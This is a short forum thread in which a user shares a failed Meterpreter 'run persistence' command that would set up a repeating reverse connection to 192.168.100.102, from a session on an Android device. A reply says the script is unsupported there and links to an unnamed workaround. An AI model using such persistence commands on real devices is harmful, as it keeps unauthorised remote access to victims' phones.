Forum Thread: java/android version of Meterpreter is not supported with this Script!

java/android version of Meterpreter is not supported with this Script!

meterpreter > run persistence -U -i 5 -p 3333 -r 192.168.100.102

  • java/android version of Meterpreter is not supported with this Script!

how to slow this problem

1 Response

The meterpreter persistence script is not supported in android/Linux. You will have to find another way to keep the connection alive, take a look at this, it should help.

Cheers,
Washu

Share Your Thoughts

  • Hot
  • Active